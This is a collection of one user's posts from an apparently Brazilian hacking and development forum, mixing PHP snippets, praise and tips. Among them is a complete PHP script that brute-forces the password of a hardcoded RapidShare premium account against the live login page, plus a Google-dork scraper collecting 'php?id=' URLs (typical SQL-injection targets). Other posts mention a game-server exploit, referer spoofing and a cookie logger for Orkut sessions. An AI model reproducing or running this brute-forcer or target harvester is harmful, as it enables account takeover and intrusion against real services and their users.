Messages

[Triplo X,]

Triplo X, esta tool foi programada em vb.NET, procure fazer o download Microsoft .NET framework, creio que irá solucionar o seu problema:
http://baixaki.ig.com.br/download/Microsoft-NET-Framework.htm

fLaSh, manooo, parabéns, é uma das melhores tools que já vi na minha vida, deve ter dado um trabalhão no .NET! Eu tava com a versão 1.0 aqui, que já era excelente. A 1.2 tá beeem melhor. Parabéns mesmo, velho! ;D

Eu lembro que essa enquete da screenshot foi burlada, uaheiuhweiuae. Fizeram um JS que ficava votando num loop.

Na época, lembro que todo mundo achava foda, auhahuuha.  ;D

Hi.

Está aí um Googler simples que acabei de fazer em PHP.  ;)

Code Select Expand

<?php
/* Simple PHP Googler
by sYnyst3r of Pink Hat */

class Googler
{
protected $dork = "allinurl:.php?id=";

public function main(){
$google = $this->urlGET("http://www.google.com.br/search?&q=".$this->dork."&num=100");
$links = $this->getLinks($google);

foreach($links[1] as $link)
echo $link."<br>";
}

protected function urlGET($url){
$fp = fopen($url, 'r');
while(!feof($fp)) $buffer .= fgets($fp, 4096);
fclose($fp);

return $buffer;
}

private function getLinks(&$google){
preg_match_all('/<li class=g><h3 class=r><a href="([^"]+)/i', $google, $links);
return $links;
}
}

$synyster = new Googler;
$synyster->main();
?>

A idéia realmente é ótima.

Creio eu que o Darkers não é só capaz de atuar no ramo de desenvolvimento, como também de segurança. Vejo no fórum muitos que tem grande conhecimento em hacking/security, há pessoas capacidatas para fazer penetration tests em sistemas e concertar as falhas que encontrarem.

Porém, isso teria que ser organizado e feito com muita responsabilidade. Geralmente, sempre há muita empolgação no início deste tipo de projeto, mas com o passar do tempo, a maioria percebe que virou uma coisa obrigatória e acaba cansando. E também, como o Magrinho Loko citou, o "filtro" de usuários para participarem deste projeto teria que ser um tanto rigoroso, hehe.

Parabéns pela idéia branco, se uma grande parte de usuários contribuirem, o Darkers pode até ir para fora da internet e virar uma grande empresa.

Atenciosamente,
synyster.

Code Select Expand

<?php
/* Remote ImageShack Uploader
by synyster
www.forum-invaders.com.br */

class ImageShack
{
    var $url = "http://files.myopera.com/Fvox/files/fx-sign.jpg";
   
    public function main(){
        $xml = $this->upload($this->TratarURL($this->url));
       
        /* Achei desnecessário chamar a class que trata XML só pra pegar um mísero link */
        preg_match_all("/\<image_link\>(.*?)\<\/image_link\>/", $xml, $url);
       
        echo '<a href="'.$url[1][0].'">Link Direto</a>';
    }
   
    private function TratarURL($url){
        if(!preg_match("/http:\/\//i", $url)) die("URL inválida.");   
        $url = trim($url);
       
        return $url;
    }
   
    private function upload($url){
        $ch = curl_init("http://www.imageshack.us/upload_api.php");
       
        $post = array("xml"=>"yes",
                      "url"=>$url
                     );
                     
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
       
        $r = curl_exec($ch);
        curl_close($ch);
       
        if($r){
            if(empty($r)) return "Ocorreu um erro na conexão com o ImageShack";
            return $r;
        }
    }   
}
   
$upload = new ImageShack;
$upload->main();

?>

Fiz 24 pontos.

A maior parte das perguntas questiona se você se sente incomodado ou se prefere conversar com pessoas virtuais do que reais. Particulamente, eu não me sinto incomodado e nem deixo de sair com meus amigos para ficar no MSN, mas eu fico boa parte do meu tempo na net, acho que foi esse o motivo de ter tirado poucos pontos nesse teste. Acho que minha pontuação devia ser mais alta, haha.  :D

Não liguem pro uso de "interface" auhhuauha. Coloquei no script mas nem sei qual a utilidade, apenas coloquei AUHAUHHUAU.




Source:

Code Select Expand

<?php

interface iRapidshare
{
public function check();
public function BruteForce($wordlist);
}

class RapidShare implements iRapidshare
{
const user = "7125654"; //login da conta no rapidshare

public function check(){
  $cli = php_sapi_name() === 'cli';
 
  if(!$cli){
   die("<b>This script is meant to be run as PHP CLI.</b>");
  }

  error_reporting(0);
  set_time_limit(0);
  dl('php_curl.so');

  print_r('
                        _               
                       | |             
  _ _ ____   ____ _  __| | ___ _ __ ___
| |  _ \ \ / / _  |/ _  |/ _ \  __/ __|
| | | | \ V / (_| | (_| |  __/ |  \__ \
|_|_| |_|\_/ \__,_|\__,_|\___|_|  |___/
     Forum Invaders (UN)SECURITY GROUP
');

  print "\n\n\n[+] RapidShare BruteForce by sYnyst3r\n[+] www.forum-invaders.com.br\n\n\n";
}

private function conn($host){
  $ch = curl_init();
 
  curl_setopt($ch, CURLOPT_URL, $host);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
      
  $r = curl_exec($ch);
  curl_close($ch);
 
  if($r){
   return $r;
  }
  else{
   die("[!] could not connect");
  }
}

public function BruteForce($wordlist){
  $wordlist = file_get_contents($wordlist);
  $wordlist = explode("\n", $wordlist);
  print "[-] Testing passwords...\n\n";
 
  foreach($wordlist as $passwd){
   $syn = $this->conn("https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi?login=".self::user."&password=".$passwd);
   
   if(preg_match("/Notification/i",$syn)){
    echo "*";
   }
   else{
    die("\n\nPassword: $passwd\n");
   }
  }
}
}

$rs = new RapidShare;
$rs->check();
$rs->BruteForce("wordlist.txt");

?>

Não entendi muito bem, mas se for o que entendi, creio que a função getcwd() resolva seu problema. Vê em que diretório a função retorna.

Se retornar para um diretório errado, usa a função chdir() junto com a getcwd().

Em junho ou julho, quando eu ainda jogava cs, fiz um exploit pra mesma coisa ahouihuaoahua.

Está bem ruinzinho, eu ainda estava no começo dos meus estudos de PHP, mas no meu, eu usei a lib cURL:
http://phpfi.com/358120

Hoje em dia é raro achar servidores com Webmod 0.48, geral já atualizou. =P

syn []'s

Interessante, pensei nisso esses dias.
Até cheguei a codar uma funçãozinha pra trocar o referer com curl em PHP. Não estou achando o script, mas era algo como:

Code Select Expand

<?php

function cURL($url, $referer){
$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_REFERER, $referer);
curl_setopt($ch, CURLOPT_URL, $url);

$r = curl_exec($ch);
if($r){
return $r;
}
else{
return curl_error($ch);
}

curl_close($ch);
}
?>
Esse esquema do google vai ser uma mão na roda.

A propósito, aqueles esquemas de bloquear links e imagens em fórums, como por exemplo o hotlinks, são bloqueados por referer? Nunca tinha parado pra pensar em como aquilo funciona. oO

Era o empurrãozinho que eu precisava para começar a fuçar no Java. =P
Parabéns cara, o tópico ficou mais do que excelente, ficou perfeito.

Há um tempo atrás eu ia começar a estudar Java, cheguei a instalar o eclipse aqui, mas desanimei quando fui instalar o plugin Visual Editor para ter a IDE em Java, e o plugin bugou.

Vou começar meus estudos em aplicações web.
Mais uma vez, parabéns pelo tópico, e obrigado. Será de grande utilidade para mim. 

Sei que vc6 nem devem estar jogando mais..........
mas eu travei no level 7....alguem pode me dar uma dica??

Na source da página, pega o link do body background (included.gif) e olha a imagem. 

[dias]

A duração do cookie do Orkut no total é 22 ou 24 dias.
Sobre o gerenciamento de cookies do Orkut, ele não é ruim não, muito pelo contrário.  :D

Mas não sei porque ainda prefiro o velho cookie logger em php ahaha. 

Adorei o exemplo de janela, agora me interessei um pouco por PHP-GTK... Amanhã vou dar uma lida em mais uns exemplos.

Muito bom mesmo cara 

Bem legal cara, eu costumo validar as páginas que serão incluídas usando um array, mas essa include que vc postou ficou muito bem organizada